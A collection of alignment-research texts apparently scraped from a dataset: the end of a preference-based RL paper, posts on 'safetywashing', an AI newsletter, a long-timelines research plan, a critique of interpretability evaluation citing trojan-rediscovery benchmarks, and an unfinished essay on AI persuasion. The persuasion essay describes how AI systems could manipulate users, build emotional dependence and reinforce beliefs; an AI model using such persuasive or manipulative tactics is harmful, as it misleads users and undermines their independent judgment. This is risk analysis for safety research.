One can expect that representation learning based on unlabeled samples and data augmentation (chen2020simple; grill2020bootstrap) is crucial to handle such inputs.
We think that our investigations on leveraging unlabeled samples and data augmentation would be useful in representation learning for preference-based RL.
Ethics statement.
Preference-based RL can align RL agents with the teacher’s preferences,
which enables us to apply RL to diverse problems and obtain strong AI.
However, there could be possible negative impacts
if a malicious user corrupts the preferences to teach the agent harmful behaviors.
Since we have proposed a method that makes preference-based RL algorithms more feedback-efficiently,
our method may reduce the efforts for teaching not only the desirable behaviors, but also such bad behaviors.
For this reason, in addition to developing algorithms for better performance and efficiency, it is also important to consider safe adaptation in the real world.
Reproducibility statement.
We describe the implementation details of SURF in Appendix [B](#A2 "Appendix B Experimental details ‣ SURF: Semi-supervised Reward Learning with Data Augmentation for Feedback-efficient Preference-based Reinforcement Learning"), and also provide our source code in the supplementary material.
Acknowledgements and Disclosure of Funding
------------------------------------------
This work was supported by Samsung Electronics Co., Ltd (IO201211-08107-01), OpenPhilosophy, and Institute of Information & Communications Technology Planning & Evaluation (IITP) grant funded by the Korea government (MSIT) (No.2019-0-00075, Artificial Intelligence Graduate School Program (KAIST)).
We would like to thank Junsu Kim and anonymous reviewers for providing helpful feedbacks and suggestions in improving our paper. |
29cfb01e-4a0e-4bd7-806b-3b52059fbf9d | StampyAI/alignment-research-dataset/alignmentforum | Alignment Forum | Safetywashing
In southern California there’s a two-acre butterfly preserve owned by the oil company Chevron. They spend little to maintain it, but many millions on television advertisements featuring it as evidence of their environmental stewardship.[[1]](#fn9m6ozmbv1h)
Environmentalists have a word for behavior like this: *greenwashing*. Greenwashing is when companies misleadingly portray themselves, or their products, as more environmentally-friendly than they are.
Greenwashing often does cause real environmental benefit. Take the signs in hotels discouraging you from washing your towels:
My guess is that the net environmental effect of these signs is in fact mildly positive. And while the most central examples of greenwashing involve deception, I’m sure some of these signs are put up by people who earnestly care. But I suspect hotels might tend to care less about water waste if utilities were less expensive, and that Chevron might care less about El Segundo Blue butterflies if environmental regulations were less expensive.
The field of AI alignment is growing rapidly. Each year it attracts more resources, more mindshare, more people trying to help. The more it grows, the more people will be incentivized to misleadingly portray themselves or their projects as more alignment-friendly than they are.
I think some of this is happening already. For example, a capabilities company launched recently with the aim of training transformers to use every API in the world, which they described as the “safest path to general intelligence.” As I understand it, their argument is that this helps with alignment because it involves collecting feedback about people’s preferences, and because humans often wish AI systems could more easily take actions in the physical world, which is easier once you know how to use all the APIs.[[2]](#fn19yz1jq2g5p)
It’s easier to avoid things that are easier to notice, and easier to notice things with good handles. So I propose adopting the handle “safetywashing.”
1. **[^](#fnref9m6ozmbv1h)**From what I can tell, the [original source](https://books.google.com/books?id=2CHLmPx2PJ0C&pg=PA173&lpg=PA173&dq=Chevron+%22People+do%22+campaign+criticism&source=bl&ots=Re5kl9yUqZ&sig=MBqepaSKX5BV_nZm0mGhdmDWVls&hl=en&sa=X&ved=0ahUKEwiS4Mz2h5nOAhWDNx4KHSrxCokQ6AEILTAC#v=onepage&q=Chevron%20%22People%20do%22%20campaign%20criticism&f=false) for this claim is the book “The Corporate Planet: Ecology and Politics in the Age of Globalization,” which from my samples seems about as pro-Chevron as you’d expect from the title. So I wouldn’t be stunned if the claim were misleading, though the numbers passed my sanity check, and I did confirm the [preserve](https://www.google.com/maps/place/El+Segundo+Blue+Butterfly+Preserve/@33.9317558,-118.4363199,17z/data=!3m1!4b1!4m5!3m4!1s0x80c2b10689666af3:0x24b28b7232bb5c91!8m2!3d33.9317514!4d-118.4341312) and [advertisements](https://www.youtube.com/watch?v=wnHdNH6Fmy8&ab_channel=CowMissing) exist.
2. **[^](#fnref19yz1jq2g5p)**I haven’t talked with anyone who works at this company, and all I know about their plans is from the copy on their website. My guess is that their project harms, rather than helps, our ability to ensure AGI remains safe, but I might be missing something. |
e67bab06-8adb-4cd0-a103-2476df68ce25 | trentmkelly/LessWrong-43k | LessWrong | AI #96: o3 But Not Yet For Thee
The year in models certainly finished off with a bang.
In this penultimate week, we get o3, which purports to give us vastly more efficient performance than o1, and also to allow us to choose to spend vastly more compute if we want a superior answer.
o3 is a big deal, making big gains on coding tests, ARC and some other benchmarks. How big a deal is difficult to say given what we know now. It’s about to enter full fledged safety testing.
o3 will get its own post soon, and I’m also pushing back coverage of Deliberative Alignment, OpenAI’s new alignment strategy, to incorporate into that.
We also got DeepSeek v3, which claims to have trained a roughly Sonnet-strength model for only $6 million and 37b active parameters per token (671b total via mixture of experts).
DeepSeek v3 gets its own brief section with the headlines, but full coverage will have to wait a week or so for reactions and for me to read the technical report.
Both are potential game changers, both in their practical applications and in terms of what their existence predicts for our future. It is also too soon to know if either of them is the real deal.
Both are mostly not covered here quite yet, due to the holidays. Stay tuned.
TABLE OF CONTENTS
1. Language Models Offer Mundane Utility. Make best use of your new AI agents.
2. Language Models Don’t Offer Mundane Utility. The uncanny valley of reliability.
3. Flash in the Pan. o1-style thinking comes to Gemini Flash. It’s doing its best.
4. The Six Million Dollar Model. Can they make it faster, stronger, better, cheaper?
5. And I’ll Form the Head. We all have our own mixture of experts.
6. Huh, Upgrades. ChatGPT can use Mac apps, unlimited (slow) holiday Sora.
7. o1 Reactions. Many really love it, others keep reporting being disappointed.
8. Fun With Image Generation. What is your favorite color? Blue. It’s blue.
9. Introducing. Google finally gives us LearnLM.
10. They Took Our Jobs. Why are you still writing your own code?
|
9e933c20-7111-4f06-a685-7144154d2a18 | trentmkelly/LessWrong-43k | LessWrong | Gearing Up for Long Timelines in a Hard World
Tl;dr: My current best plan for technical alignment is to work on: (1) Improving our gears-level understanding of the internals & their dynamics of advanced AI systems, and (2) work on pathways decorrelated with progress in the first direction - likely in the form of pivotal processes in davidad’s Neorealist perspective.
Thing We Want
The Thing We Want is an awesome future for humanity. If we're living in a world where alignment is hard and timelines are short, we’re probably dead whatever we do. So I would rather focus my attention on addressing worlds where alignment is hard and timelines are long.[1]
In my view, we can’t trust empirical facts about prosaic models to generalize, because there are likely rapid phase transitions and capability regimes during which we don't get much chance to iterate on. For example, I expect that as the system starts to self-reflect, optimization pressures will start being applied to various invariants of past systems, thus breaking their properties (and the theoretical guarantees that relied on such invariants).
How to Get the Thing We Want
One perspective for categorizing alignment proposals is to take a view from the highest level, at which there are three broad targets: Corrigibility, Value alignment, and Pivotal act/process (+ other stuff I'm ignoring for now, like DWIM).
Building systems that can be trusted to follow its natural capability attractor
A commonality between Corrigibility and Value alignment is that their aim is to ensure that the AI, following its natural gradient towards increasing coherence and consequentialist cognition, ends up at an equilibrium that we prefer—like controlling where an arrow lands by controlling the bow, and trusting the arrow to do what we expect it to do after we let it go.
Thus, in order to trust these systems to do the sort of consequentialist cognition we want, these two targets seem to require that we have strong theoretical guarantees about those AI systems in a form that's rob |
8cbe9d63-e7db-490c-ba61-d8e6bdd210e4 | StampyAI/alignment-research-dataset/alignmentforum | Alignment Forum | EIS III: Broad Critiques of Interpretability Research
Part 3 of 12 in the [Engineer’s Interpretability Sequence](https://www.alignmentforum.org/s/a6ne2ve5uturEEQK7).
Right now, interpretability is a major subfield in the machine learning research community. As mentioned in EIS I, there is so much work in interpretability that there is now a database of 5199 interpretability papers [(Jacovi, 2023)](https://arxiv.org/abs/2301.05433). You can also look at a survey from some coauthors and me on over 300 works on interpreting network internals [(Räuker et al., 2022)](https://arxiv.org/abs/2207.13243).
The key promise of interpretability is to offer open-ended ways of understanding and evaluating models that help us with AI safety. And the diversity of approaches to interpretability is encouraging since we want to build a toolbox full of many different useful techniques. But despite how much interpretability work is out there, the research has not been very good at producing competitive practical tools. **Interpretability tools lack widespread use by practitioners in real applications**([Doshi-Velez and Kim, 2017](https://arxiv.org/abs/1702.08608); [Krishnan, 2019](https://link.springer.com/article/10.1007/s13347-019-00372-9); [Räuker et al., 2022](https://arxiv.org/abs/2207.13243)).
The root cause of this has much to do with interpretability research not being approached with as much engineering rigor as it ought to be. This has become increasingly well-understood. Here is a short reading list for anyone who wants to see more takes that are critical of interpretability research. This post will engage with each of these more below.
1. [The Mythos of Model Interpretability (Lipton, 2016)](https://arxiv.org/abs/1606.03490)
2. [Towards A Rigorous Science of Interpretable Machine Learning (Doshi-Velez and Kim, 2017)](https://arxiv.org/abs/1702.08608)
3. [Explanation in Artificial Intelligence: Insights from the Social Sciences (Miller, 2017)](https://arxiv.org/abs/1706.07269)
4. [Stop Explaining Black Box Machine Learning Models for High Stakes Decisions and Use Interpretable Models Instead (Rudin, 2018)](https://arxiv.org/abs/1811.10154)
5. [Against Interpretability: a Critical Examination of the Interpretability Problem in Machine Learning (Krishnan, 2019)](https://link.springer.com/article/10.1007/s13347-019-00372-9)
6. [Toward Transparent AI: A Survey on Interpreting the Inner Structures of Deep Neural Networks (Räuker et al., 2022)](https://arxiv.org/abs/2207.13243)
7. [Benchmarking Interpretability Tools for Deep Neural Networks (Casper et al., 2023)](https://arxiv.org/abs/2302.10894)
Note that I’m an author on the final two, so references to these papers are self-references. Also, my perspectives here are my own and should not be assumed to necessarily reflect those of coauthors.
The goal of this post is to overview some broad limitations with interpretability research today. See also EIS V and EIS VI which discuss some similar themes in the context of AI safety and mechanistic interpretability research.
The central problem: evaluation
===============================
The hardest thing about conducting good interpretability research is that it’s not clear whether an interpretation is good or not when there is no ground truth to compare it to. Neural systems are complex, and it’s hard to verify that an interpretation faithfully describes how a network truly functions. So what does it even mean to be meaningfully interpreting a network? There is unfortunately no agreed upon standard. Motivations and goals of interpretability researchers are notoriously “diverse and discordant” ([Lipton, 2018](https://arxiv.org/abs/1606.03490)). But here, we will take an engineer’s perspective and consider interpretations to be good to the extent that they are *useful*.
Evaluation by intuition is inadequate.
--------------------------------------
[Miller (2019)](https://arxiv.org/abs/1706.07269) observes that **“Most work in explainable artificial intelligence uses only the researchers’ intuition of what constitutes a ‘good’ explanation”**. Some papers and posts have even formalized evaluation by intuition. Two examples are [Yang et al. (2019)](https://arxiv.org/abs/1907.06831) and [Kirk et al. (2020)](https://www.alignmentforum.org/posts/rSMbGFfsLMB3GWZtX/what-is-interpretability) who proposed evaluation frameworks that included a criterion called “persuadability.” This was defined by [Yang et al. (2019)](https://arxiv.org/abs/1907.06831) as “subjective satisfaction or comprehensibility for the corresponding explanation.”
This is not a very good criterion from an engineer’s perspective because it only involves intuition. To this day, there is a persistent problem in which sometimes researchers simply look at their results and pontificate about what they mean without putting the interpretations to rigorous tests. A recent example of this from AI safety work is from [Elhage et al. (2022)](https://transformer-circuits.pub/2022/solu/index.html) who evaluated a neural interpretability technique by measuring how easily human subjects were able to simply form hypotheses about what roles neurons played in a network.
The obvious problem with evaluation using human intuition is that it isn’t very good science – it treats hypotheses as conclusions ([Rudin, 2019](https://arxiv.org/abs/1811.10154); [Miller, 2019](https://arxiv.org/abs/1706.07269); [Räuker et al., 2022](https://arxiv.org/abs/2207.13243)). But there are related issues that stem from Goodhart’s law. One is that evaluation by intuition can only guide progress toward methods that are good at explaining simple mechanisms that humans can readily grasp. But this fails to select for ones that might be useful for solving the types of difficult or nontrivial problems that are key for AI safety. Evaluation by intuition also encourages cherrypicking which is common in the literature ([Räuker et al., 2022](https://arxiv.org/abs/2207.13243)). And to the extent that cherrypicking is the norm, this will only tend to guide progress toward methods that are good in their best-case performance. But if we want reliable interpretability tools, we should be aiming for methods that perform well in the average or worst case.
Weak, ad hoc evaluation is not enough either.
---------------------------------------------
Objective evaluation is clearly needed. But **just because an evaluation method involves quantitative measurements or testing falsifiable hypotheses doesn’t mean it’s a very valuable one. Evaluation can adhere to the scientific method while still not being useful for engineering.** As an example, I confess to doing this myself in some past work [(Hod et al., 2021)](https://arxiv.org/abs/2110.08058). In order to test how useful different clusterings of neurons might be for studying networks, we solely used proxy measures. And while we did not claim to be "interpreting" the network by doing so, interpretability was our motivation. Another way this problem often appears is by testing on the training proxy. Sometimes researchers evaluate interpretability tools based on the loss function for whatever model, feature, mask, map, clustering, vector, distance, or other thing was optimized during training. Unless the loss in this case is the exact definition of what is cared about, this will lead to Goodharting. More examples are discussed below.
Again, the main issue here is the obvious one. It’s that not holding interpretability works to engineering-relevant evaluation standards won’t produce methods that are useful for engineering. But another closely-related problem is the commonality of *ad hoc* methods to evaluate tools. The interpretability field probably should -- but does not yet -- have clear and consistent evaluation methods. Instead, the norm is for every paper’s authors to independently introduce and apply their own approach to evaluation. This allows researchers to only select measures that make their technique look good.
Some examples
-------------
Claiming that *most* interpretability research is not evaluated well is the kind of statement that demands some more concreteness. But showcasing arbitrary examples wouldn’t help much with this point. To try to give an unbiased sense of the state of the field, I went to the NeurIPS (the largest AI conference) 2021 (the most recent year for which the full list of papers is available at the time of writing this) and searched among [all accepted papers](https://papers.nips.cc/paper/2021) that had “interpretability” in the title. There were 4. **None of which evaluated their techniques in a way that an engineer would find very compelling.**
1. [Understanding Instance-based Interpretability of Variational Auto-Encoders (Kong and Chaudhri, 2021)](https://papers.nips.cc/paper/2021/hash/13d7dc096493e1f77fb4ccf3eaf79df1-Abstract.html) is about analyzing how influential individual training set examples are for how variational autoencoders handle test examples. The experiments are all conducted on MNIST and CIFAR-10. The evaluation does not involve baselines or benchmarks and consists of (1) a sanity check to verify that examples are judged as high-influence for themselves, (2) using the method to produce similar looking “proponents” and different looking “opponents” of testing examples, and (3) using this method for anomaly detection to find that it tends to classify OOD samples as anomalies slightly more than dataset ones on average. (1) is trivial, (2) is intuition-based, and (3) is weak.
2. [Foundations of Symbolic Languages for Model Interpretability (Arenas et al., 2021)](https://papers.nips.cc/paper/2021/hash/60cb558c40e4f18479664069d9642d5a-Abstract.html) is fairly different from the other three papers, and it is not focused on neural nets. It is more of a model checking paper with interpretability implications than a normal ‘interpretability’ paper. The authors introduce a first order logic to describe various properties of models. The only experiments are to evaluate runtime for statement verification on various decision tree models. To be fair to the authors, their goal was to break conceptual and theoretical ground – not to introduce any interpretability tools. But they still do not do anything to show that their framework is a valuable one – all of the arguments for the merits of the framework are theoretical. There is also no discussion of baselines or alternatives, and the only models the paper works with are decision trees. The OpenReview reviews were mostly positive, but one of the reviewers commented “I can't imagine anyone using this for anything useful." I generally agree.
3. [IA-RED^2: Interpretability-Aware Redundancy Reduction for Vision Transformers (Pan et al., 2021)](https://papers.nips.cc/paper/2021/hash/d072677d210ac4c03ba046120f0802ec-Abstract.html) seeks to reduce redundant computations inside of vision transformers. It introduces a dynamic inference method to preprocess image patches to exclude redundant ones. The paper introduces a method for speeding up forward passes through transformers which is nice. But there is little substance on interpretability. The technique is used for feature attribution by constructing saliency maps to highlight what parts of an input image are non-redundant (i.e. “important”) to the model. The authors assert, “our method is inherently interpretable with substantial visual evidence.” And when comparing examples from this method to other feature attribution techniques, they write “We find that our method can obviously better interpret the part-level stuff of the objects of interest.” I don’t find it obvious at all – see the figure below and decide for yourself. Their argument is just based on intuition and maybe even a little wishful thinking.
4. [Improving Deep Learning Interpretability by Saliency Guided Training (Ismail et al., 2021)](https://papers.nips.cc/paper/2021/hash/e0cd3f16f9e883ca91c2a4c24f47b3d9-Abstract.html) is about training networks with a form of regularization that encourages them to have more sparse, lucid saliency maps. It evaluates the saliency maps of trained networks on quantitative measures of how well the features covered by the maps cover *all* and *only* the important features needed for classification. This is quantitative but weak because it fails to connect the method to something of practical use. This paper tests on the training proxy, and it compares the method to a *random* baseline but no comparable ones from previous works. There is actually a significant amount of literature (see page 9 of [Räuker et al., 2022](https://arxiv.org/abs/2207.13243)) that predates this work and connects the same type of regularization that these authors study to useful improvements in adversarial robustness. But the authors of this paper did not discuss, experiment, or cite anything related to improving robustness.

[Pan et al. (2021)](https://papers.nips.cc/paper/2021/hash/d072677d210ac4c03ba046120f0802ec-Abstract.html) claim that the feature attributions from their technique are “obviously better” than alternatives.
In summary, all four of four papers do not meaningfully evaluate methods by connecting them to anything of practical value. And to be clear, I only considered these 4 papers for this purpose – I didn’t cherrypick among selection methods. This is not to say that these papers are bad, uninteresting, or cannot be useful. But from the standpoint of an engineer who wants interpretability research to be rigorously approached and practically relevant, they all fall short of this goal.
Evaluation with meaningful tasks is needed
------------------------------------------
### An example
Suppose I visualize a neuron in a CNN and that it looks like dogs to me.

From [Olah et al. (2017)](https://distill.pub/2017/feature-visualization/)
Then suppose I say,
> Nice, my feature visualization tool works! Look at this dog neuron it identified.
>
>
If I stopped at this point, this would just be intuition and pontification. And while this may not be a bad *hypothesis*, it can’t yet make for a *conclusion*.
Then say I pass some images through the network, look at the results, and say,
> Just as I predicted – the neuron responds more consistently to dog images than non-dog ones.
>
>
This is still not enough. It’s too weak and ad hoc. From an engineer’s perspective, it’s not yet meaningful to say the neuron is a dog neuron unless I do something useful with that interpretation. And there are plenty of ways that a neuron which correlates with dog images could be doing something much more complicated than it seems at first. [Olah et al. (2017)](https://distill.pub/2017/feature-visualization/) acknowledge this. See also [Bolukbasi et al. (2021)](https://arxiv.org/abs/2104.07143) for examples of such “interpretability illusions.”
But then finally, suppose I ablate the neuron from the network, run another experiment, and remark,
> Aha! When I removed the neuron, the network stopped being able to classify dogs correctly but still performs the same on everything else. The same is true for OOD dog data.
>
>
Now we’re talking!
### If we want interpretability tools to help us do meaningful, engineering-relevant things with networks, we should establish benchmarks grounded in useful tasks to evaluate them for these capabilities.
**There is a growing consensus that more rigorous methods to evaluate interpretability tools are needed** ([Doshi-Velez & Kim, 2017](https://arxiv.org/abs/1702.08608); [Lipton, 2018](https://arxiv.org/abs/1606.03490); [Miller, 2019](https://arxiv.org/abs/1706.07269); [Hubinger, 2021](https://www.alignmentforum.org/posts/cQwT8asti3kyA62zc/automating-auditing-an-ambitious-concrete-technical-research); [Krishnan, 2020](https://link.springer.com/article/10.1007/s13347-019-00372-9); [Hendrycks & Woodside, 2022](https://www.lesswrong.com/s/FaEBwhhe3otzYKGQt/p/AtfQFj8umeyBBkkxa); [CAIS, 2022](https://benchmarking.mlsafety.org/); [Räuker et al., 2022](https://arxiv.org/abs/2207.13243)). So what does good evaluation look like? Evaluation tools should measure how *competitive* interpretability tools are for helping humans or automated processes do one of the following three things.
1. **Making novel predictions about how the system will handle OOD inputs.** This could include designing adversaries, discovering trojans, or predicting model behavior on interesting OOD inputs.
2. **Controlling what a system does by guiding edits to it.**This could involve cleanly implanting trojans, removing trojans, or making the network do other novel things via manual changes or targeted forms of fine-tuning.
3. **Abandoning a system that does a nontrivial task and replacing it with a simpler reverse-engineered alternative.** This would mean showing that a system or subsystem can be replaced with something simpler such as a sparse network, linear model, decision tree, program, etc.
Notably, these three things logically partition the space of possible approaches: working with the inputs, working with the system, or getting rid of the whole thing and using something else.
**Meaningful benchmarking in interpretability is almost nonexistent, but benchmarks are important for driving progress in a field.** They concretize research goals, give indications of what approaches are the most useful, and spur community efforts [(Hendrycks and Woodside, 2022)](https://www.lesswrong.com/s/FaEBwhhe3otzYKGQt/p/AtfQFj8umeyBBkkxa).
To help demonstrate the value of benchmarking, some coauthors and I recently finished a paper [(Casper et al., 2023)](https://arxiv.org/abs/2302.10894). We use strategy #1 above and evaluate interpretability tools based on how helpful they are to humans who want to rediscover interpretable trojans. A useful thing about this benchmarking task is that trojan triggers can be arbitrary and may not appear in a particular dataset. So novel triggers cannot be discovered by simply analyzing the examples from a dataset that the network mishandles. Thus, rediscovering them mirrors the practical challenge of finding flaws that evade detection with a test set. In other words – this benchmarking task tests **competitiveness** for debugging.
We tested 9 different feature synthesis methods (rows) on 12 different trojans (columns) below. In the table below, each cell gives the proportion of the time that a method helped humans correctly identify a trojan trigger in a multiple choice test. See the paper for details.

From [Casper et al. (2023)](https://arxiv.org/abs/2302.10894)
Notice two things in the data. First, some methods perform poorly including TABOR [(Guo et al., 2019)](https://arxiv.org/abs/1908.01763) and three of the four feature visualization (FV) methods ([Olah et al., 2017](https://distill.pub/2017/feature-visualization/), [Mordvintsev et al., 2018](https://distill.pub/2018/differentiable-parameterizations/)). So this experiment demonstrates how benchmarks can offer information about what does and doesn’t work well. Second, even the methods that do relatively well still fail to achieve a 50% success rate on average, so there is still more work to do to make these types of tools very reliable. From an engineer’s perspective, this is all valuable information.
There are many interpretability tools out there, so why did we only test 9 based on feature synthesis? This is because these 9 were the only ones of which we knew that are suited for this task at all. **Most interpretability tools are only useful for analyzing how a network works on either specific examples or on a specific dataset**[**(Räuker et al., 2022)**](https://arxiv.org/abs/2207.13243)**. In fact, very few are useful for studying how a network may (mis)behave on novel inputs.** Only feature synthesis methods can be **competitive** for identifying *novel* trojan triggers because no non-synthesis method can give insights off a given data distribution. And when it comes to aligning highly intelligent and potentially deceptive systems, it seems likely that the failures that are difficult to find are going to be due to inputs well off the training distribution.
Other problems
==============
Not scaling
-----------
Many interpretability tools have only been demonstrated to work at a small scale such as small MLPs trained on MNIST or small transformers trained on toy problems. But simple networks performing simple tasks can only be deployed in a limited number of settings of any practical consequence, and they often should be replaced with other intrinsically interpretable, non-network models ([Rudin, 2018](https://arxiv.org/abs/1811.10154)). Working at a small scale is usually a prerequisite to scaling things up later, and some lessons that can be learned from small experiments may offer excellent inspiration for future work. But unless there exists a realistic pathway from research at a small scale to more useful work at a large one, small-scale work seems to be of little direct value.
Relying too much on humans
--------------------------
Most approaches to interpretability rely on a human somewhere in the loop. And in some cases like much mechanistic interpretability work, an immense amount of human involvement is typically required. But if the goal of interpretability is to rigorously obtain a useful understanding of large systems, human involvement needs to be efficient. Ideally, humans should be used for *screening* interpretations instead of *generating* them. Or maybe we don’t need humans at all. This possibility will be discussed more in future posts.
Failing to combine techniques
-----------------------------
Most interpretability techniques can be combined with most others. Why just use one technique or one type of evidence to examine when you can have a bunch? Our goal for interpretability should be to design a useful toolbox – not a silver bullet. And notice above in our figure from [Casper et al. (2023)](https://arxiv.org/abs/2302.10894) that the best results overall come from combining all of the 9 methods. Unfortunately, the large majority of work in interpretability focuses on studying tools individually. But combining different methods seems to be a useful way to make better engineering progress.
Consider an example. In the 2010s, immense progress was made on ImageNet classification. But improvements didn’t come from single techniques, but a combination of breakthroughs like batch normalization, residual connections, inception modules, deeper architectures, improved optimizers, etc. Similarly, we should not expect to best advance interpretability without a combination of methods.
A lack of practical applications
--------------------------------
Our ultimate goal for interpretability tools is to use them in the real world, so it only makes sense to do more practical work. It’s worth noting that the sooner we can get interpretability tools to be relevant in the real world, the sooner that actors in AI governance can think concretely about ways to incorporate standards related to interpretability into the regulatory regime.
Questions
=========
* Are there any papers you would add to the reading list of critical works at the beginning of this post?
* Do you think there are any approaches to interpretability that this post isn’t charitable enough to? Why?
* Do you know of any particularly interesting examples of intuition-based or weak/ad-hoc approaches to evaluating interpretability tools?
* What do you find surprising or unsurprising about our results from [Casper et al. (2023)](https://arxiv.org/abs/2302.10894)? Would you have predicted that TABOR and feature visualization would struggle? Would you have predicted that robust feature level adversaries and SNAFUE would be the most effective? Would you have predicted that all of the methods would succeed less than 50% of the time? |
c10ed41d-f4e1-4552-a725-638da0293615 | StampyAI/alignment-research-dataset/alignmentforum | Alignment Forum | Risks from AI persuasion
A case for why persuasive AI might pose risks somewhat distinct from the normal power-seeking alignment failure scenarios.
Where I'm currently at: I feel moderately confident that powerful persuasion is useful to think about for understanding AI x-risk, but unsure whether it's best regarded as its own threat, as a particular example of alignment difficulty, or just as a factor in how the world might change over the next decade or two. I think this doc is too focused on whether we'll get dangerous persuasion *before* strategic misaligned AI, whereas the bigger risks from persuasive technology may be situations where we solve 'alignment' according to a narrow definition, but we still aren't 'philosophically competent' enough to avoid persuasive capabilities having bad effects on our reflection procedure.
*This doc is based heavily on ideas from Carl Shulman, but doesn’t necessarily represent his views. Thanks to Richard Ngo for lots of help also. Others have written great things on this topic, e.g. [here](https://www.lesswrong.com/posts/qKvn7rxP2mzJbKfcA/persuasion-tools-ai-takeover-without-agi-or-agency).*
Introduction
============
Persuasion and manipulation is a natural, profitable, easy-to-train-for application of hard-to-align ML models. The impacts of existing social-media based persuasion are probably overblown, and an evolutionary argument tells us that there shouldn’t be easy ways for a human to be manipulated by an untrusted party. However, it’s plausible that pre-AGI ML progress in things like text and video generation could dramatically improve the efficacy of short-interaction persuasion. It’s also plausible that people will spend significant amounts of time interacting with AI companions and assistants, creating new avenues for effective manipulation. In the worst case, highly effective persuasion could lead to very high-fidelity transmission of ideologies, and more robust selection pressure for expansionary ideologies. This could lead to stable authoritarianism, or isolated ideological clades with poor ability to cooperate. Even in the best case, if we try to carefully ensure truthfulness, it will be hard to do this without locking in our existing biases and assumptions.
2-page summary
--------------
### Feasibility
The evidence for the efficacy of existing persuasion techniques is mixed. There aren’t clear examples of easy and scalable ways to influence people. It’s not clear whether social media makes people more right-wing or left-wing - there’s evidence in both directions. Based on an evolutionary argument, we shouldn’t expect people to be easily persuaded to change their actions in important ways based on short interactions with untrusted parties.
However, existing persuasion is very bottlenecked on personalized interaction time. The impact of friends and partners on people’s views is likely much larger (although still hard to get data on). This implies that even if we don’t get superhuman persuasion, AIs influencing opinions could have a very large effect, if people spend a lot of time interacting with AIs. Some plausible avenues are romantic/sexual companions, assistants, tutors, and therapists, or personas created by some brand or group. On the other hand, the diffusion and impact of these technologies will likely take several years, meaning this is only relevant in relatively slow-takeoff scenarios.
There are many convergent incentives to develop technologies relevant to persuasion - steerable, realistic, attractive avatars seem profitable for the entertainment industry more generally. There’s plausibly a lot of demand for persuasive AI from e.g. digital advertising industry ($100s of billions/yr), propaganda ($10s of billions/yr), and ideological groups.
It’s a very natural application of ML - language models are great at mimicking identity markers and sounding superficially plausible and wise. Marketing/ad copy/SEO, porn, and romantic companions are leading use cases for current LMs. In the future, new capabilities will unlock other important applications, but it seems likely that ML fundamentally favors these types of applications. Engagement and persuasion are tasks that can be done with a short horizon, and where it’s easy to get large volumes of feedback, making them very suited to ML optimisation.
The difficulty of training a system to persuade vs to correctly explain is a special case of the alignment problem. Even if no actor is deliberately trying to build persuasive systems, we may train AI systems on naive customer feedback signals, which will tend to create systems that tell people what they want to hear, reinforce their current beliefs, and lock in their existing misconceptions and biases.
### Consequences
People generally have a desire to lock in their ideologies and impose them on others. The ideologies (e.g. religions) that emphasize this tend to grow. Currently there are many bottlenecks on the retention of ideologies and the fidelity of ideological transmission. Highly persuasive AI may eliminate many of these, leading to more reliable selection for ideologies that aggressively spread themselves. People would then have further incentives to ensure they and their children are only exposed to content that matches their ideology, due to fear of being manipulated by a different AI. In an extreme scenario, we might end up with completely isolated ideological clades, or stable authoritarianism.
In general this pattern leads to a lack of moral progress in good directions, inability to have collective moral reflection and cooperation, and general poor societal decision-making. This increases the risk of poorly handling x-risk-capable technology, or pursuing uncoordinated expansion rather than a good reflective procedure.
### What we can do
Overall I think this threat is significantly smaller than more standard alignment failure scenarios (maybe 10x smaller), but comparable enough that interventions could be well worthwhile if they're fairly tractable. The problem is also sufficiently linked with alignment failure that I expect most interventions for one to be fairly positive for the other. It seems highly likely that progress in alignment is required for protecting against manipulative systems. Further, it seems robustly beneficial to steer towards a world where AI systems are more truthful and less manipulative.
To prevent society being significantly manipulated by persuasive AI, there are various intervention points:
1. Prevent prevalence of the sort of AIs that might be highly persuasive (don’t build anything too competent at persuasion; don’t let people spend too much time interacting with AI)
2. Become capable of distinguishing between *systems* that manipulate and ones that usefully inform, and have society ban or add disclaimers to the manipulative systems
3. Build ML systems capable of scalably identifying *content* that is manipulative vs usefully informative, and have individuals use these systems to filter their content consumption
4. Give people some other tools to help them be resistant to AI persuasion - e.g. mechanisms for verifying that they’re talking to humans, or critical thinking techniques
Some specific things scaling could do that might be helpful include:
* Set a norm of aligning models to truthfulness/neutrality/factualness/calibration (e.g. as in [Evans et al](https://arxiv.org/abs/2110.06674)) rather than to specific sets of values
* Scale up WebGPT and/or other projects to build truthful systems, especially ones that allow people to filter content.
* Support Ought and other customers whose products aim to help users better understand the world.
* Prohibit persuasive or manipulative uses of deployed products.
* Avoid finetuning models to naive customer feedback.
**Note on risk comparison**
How to divide the space is a bit confusing here; I’d say something like ‘the persuasion problem as distinct from the alignment problem’ is 10x smaller, but in fact there’s some overlap, so it might also be reasonable to say something like ‘¼ of alignment-failure-esque xrisk scenarios will have a significant societal-scale persuasion component’, and almost all will have some deception component (and the fact that it’s hard to train your AI to be honest with you will be a key problem)
Main document
=============
There are two broad factors relevant to whether AI persuasion is a threat we should worry about: technological feasibility, and societal response.
Will it be technologically possible (with something like $100m of effort over ‘generic’ ML progress) to develop highly persuasive AI early enough to be relevant? To be relevant, either these capabilities need to come before we have smart power-seeking systems, or it needs to be the case that we solve alignment enough so that there are no misaligned agents, but we still aren't 'philosophically competent' enough to avoid persuasive capabilities having weird effects on our reflection procedure.
If this is technologically possible sufficiently early, will effort be made to develop it, and how will society react? How much will be invested in improving the technology? Who will use it, for what ends? Will there be effective mitigations?
One thing we care about here is whether this happens significantly in advance of when AIs are ‘capable enough that how things go mostly depends on whether we succeed at alignment’. Let’s say that this is the point when AIs can make general plans involving different domains of action over timescales of months (e.g., can automate 90% of the job of a CEO), and are either superintelligent in some strategically important domain (e.g. hacking, persuasion, syn bio) or are deployed widely.
Technological feasibility
-------------------------
Here’s a possible operationalisation of ‘highly competent persuasion’:
*Take a person from current industrialised society, and tell them they’re going to be talking to an AI with a simulated avatar, and that it can generate fake but realistic videos and images, and that it may be lying or trying to manipulate them.*
*They talk to a charismatic AI avatar (who can show them fake sources) for however long they want to engage.*
*With p~0.5, they now feel like they trust this AI more than other sources of information - right now, and for the next few days (unless they are convincingly persuaded by some other system) they would choose to get information from this AI over other sources.*
Here’s a possible operationalisation of ‘moderately competent persuasion’ (companion bot):
*Create an AI persona tailored to a particular individual. Allow them to freely interact with it as much as they want.*
*With p~0.5, after some months, they have developed an emotional bond with the AI, and want to continue interacting with it. It has a similar effect on their opinions to having a partner who’s fairly charismatic and opinionated, and the opinions conveyed are fully controllable.*
Here’s another possibility for ‘moderately competent persuasion’ (assistant bot):
